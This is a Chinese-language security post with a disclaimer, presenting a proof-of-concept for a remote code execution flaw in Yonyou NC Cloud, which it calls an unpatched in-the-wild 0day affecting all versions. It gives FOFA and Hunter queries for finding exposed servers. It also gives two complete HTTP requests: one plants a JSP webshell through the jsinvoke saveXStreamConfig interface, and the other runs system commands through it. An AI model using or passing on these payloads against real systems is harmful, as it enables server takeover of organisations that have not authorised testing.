免责声明
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
0x01.产品介绍
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台。
0x02.漏洞原理
该远程代码执行漏洞可以通过特定接口上传文件,通过上传的webshell执行命令,攻击者可利用该漏洞获取服务器控制权,目前全版本通杀,在野0day利用请注意授权
0x03.影响版本
全版本
0x04.资产梳理
fofa:app="用友-NC-Cloud"
hunter:web.body="uap/rbac"
0x05.漏洞利用
该漏洞利用需要两步进行
1.访问用友NC Cloud页面进行抓包,使用如下poc对数据包进行更改,上传一个404.jsp的马子,响应包出现404/200都可利用
POST /uapjs/jsinvoke?action=invoke HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: cookiets=1689926932994; JSESSIONID=0FD29A981AF92D9A9576418F71F993D0.serverContent-Type: application/x-www-form-urlencodedContent-Length: 247{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
2.上传成功后使用如下poc进行远程命令执行
POST /404.jsp?error=bsh.Interpreter HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: cookiets=1689926932994; JSESSIONID=0FD29A981AF92D9A9576418F71F993D0.serverContent-Type: application/x-www-form-urlencodedContent-Length: 95cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream()
